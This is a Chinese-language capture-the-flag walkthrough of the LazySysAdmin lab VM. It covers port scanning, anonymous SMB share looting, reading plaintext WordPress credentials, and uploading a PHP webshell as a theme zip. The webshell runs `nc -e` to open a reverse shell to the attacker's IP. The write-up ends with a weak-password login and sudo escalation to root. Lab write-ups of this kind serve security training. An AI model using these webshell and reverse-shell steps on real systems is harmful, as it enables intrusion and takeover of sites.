LazySysAdmin - WordPress拿立足点的标准流程

主机发现

sudo nmap --min-rate 10000 -p- 192.168.xx.xx

渗透顺序:80,139/445/,22~3306

 139 445 samba的共享服务

3306 mysql 注入和配置文件相关的内容

sudo nmap -sT -sV -sT -O -p22,80,139,445,3306,6667

 对http进行渗透

目录爆破并访问页面查看页面提供源

sudo dirb -u http://xx

 对139/445进行smbclient无密码探测

sudo smbclient -L victim's ip

 对share$路径查看文件内容

sudo smbclient '\\192.168.95.134\share$'

 将所有内容下载下来

smb: \> mget *.*

发现有wordpress的目录,进入目录查看

cd wordpress 

ls

 下载配置文件和license.txt->用于精确定位wordpress的漏洞版本

get wp-config.php

get license.txt 

进入到其他目录 backnode_files目录中

ls查看目录文件看有没有什么异常的地方

 看到里面有一个特殊编码的jpg将他下载下来

get AAEAA table

再次初次筛选其他目录的文件

分别进入到wp test old 目录中并ls查看文件内容但是都为空,所以退出

 

退出后整理内容

分别查看文件包含什么

jpg可以使用binwalk查看是否隐藏其他文件,exiftool可以查看图片属性

cat 命令同时查看多个文件

发现一个弱口令12345

查看license.php可以看到wp的版本

查看wp-config.php看到了明文的用户名密码

保留两个敏感的账号和密码

进入到wp的管理端页面让它跳转登录(管理端页面的地址需要记住)

192.168.95.134/wordpress/wp-admin

跳转到登陆页面使用wpconfig里的明文账号密码登录

 拿shell

建立一个zip文件将一句话木马sh.php放入,wp后台的主题管理,上传主题,安装,后门路径则为wp-content/plugins/sh/sh.php

sh.php( nc -e 192.168.95.36 1234 &)

kali: nc -lvnp 1234

访问网站获得shell

 获取shell

权限分析

whoami　　#查看权限

uname -a 　　#查看linux版本

dkpg -l | grep python　　#查看是否有python数据包　　返回dkpg not found 

1.尝试python pty获取更好的交互式命令行shell

python -c "import pty;pty.spawn('/bin/bash')"

2.尝试使用clear发现说term environment variable not set 

export term=xterm-color

在使用clear -成功

3.查看ip地址

ip a 

4.查看所在位置并渠道家目录查看flag文件

pwd 

cd /home/togie

5.查看网站下有没有什么敏感信息

cd /var/www/html

尝试能够通过弱口令12345登录到togie用户

su togie 12345 成功

 1.查看权限

sudo -l 

发现是all已经是全部shell

直接通过sudo /bin/bash进行提权得到root

去到root的家目录查看是否有flag

cd /root

ls -liah

cat proof.txt 发现flag